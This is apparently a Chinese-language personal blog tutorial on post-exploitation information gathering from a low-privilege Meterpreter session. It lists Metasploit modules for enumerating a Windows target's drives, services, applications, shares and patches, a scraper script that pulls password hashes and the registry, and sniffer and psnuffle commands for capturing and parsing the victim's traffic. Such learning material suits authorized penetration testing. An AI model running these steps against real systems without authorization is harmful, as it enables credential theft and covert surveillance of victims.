后渗透学习四（信息收集）

信息收集在整个渗透流程中都是至关重要的，而这次我们一起简单学习下当拿到一个meterpreter低权限后，怎么对目标机器进行信息收集

信息收集相关
MSF模块
获取目标机器的分区情况：post/windows/gather/forensics/enum_drives
判断是否为虚拟机：post/windows/gather/checkvm
开启哪些服务：post/windows/gather/enum_services
安装了哪些应用：post/windows/gather/enum_applications
查看共享：post/windows/gather/enum_shares
获取主机最近的系统操作：post/windows/gather/dumplinks
查看补丁：post/windows/gather/enum_patches
scraper脚本     （将password的hash值，注册表的全部信息下载下来）
Winenum脚本（操作系统的信息，环境变量，网路接口路由，用户账户）（与scraper脚本差不多）

以上都是在meterpreter的交互界面进行 run + 模块，这里我演示一下查看共享的情况和补丁情况（复现操作不知道怎么建立共享文件夹的参考我的计算机小技巧模块）http://47.94.45.245/2020/01/16/%e4%bd%bf%e7%94%a8%e5%85%b1%e4%ba%ab%e6%96%87%e4%bd%b3%e5%a4%b9/

补丁情况也可以在进入shell界面输入systeminfo查看（查看补丁可以避免适用已打补丁的payload）

提一下scraper模块，他下载下来的文件在/root/.msf4/logs/scripts/scraper/192.168.194.129_20200115.39090138（以目标机器ip和日期命名）下，当查看某些信息出现乱码的时候（参考我的计算机小技巧中的kali编码问题）http://47.94.45.245/2020/01/16/kali%e7%bc%96%e7%a0%81%e9%97%ae%e9%a2%98/

通过获取流量包的方式获取 目标机上的信息

抓包与解包

抓包
在meterpreter下进行：需要有system权限
加载sniffer：load sniffer（首先加载）
查看网卡信息：sniffer_interfaces
开启监听：sniffer_start 对应网卡id
导出数据包：sniffer_dump 1(对应网卡id) 1.cap
可以用wireshark导入该数据包进行查看
解包
use auxiliary/sniffer/psnuffle
set pacfile /root/1.cap
exploit
流量包中目标机进行的操作都会被在终端上输出看到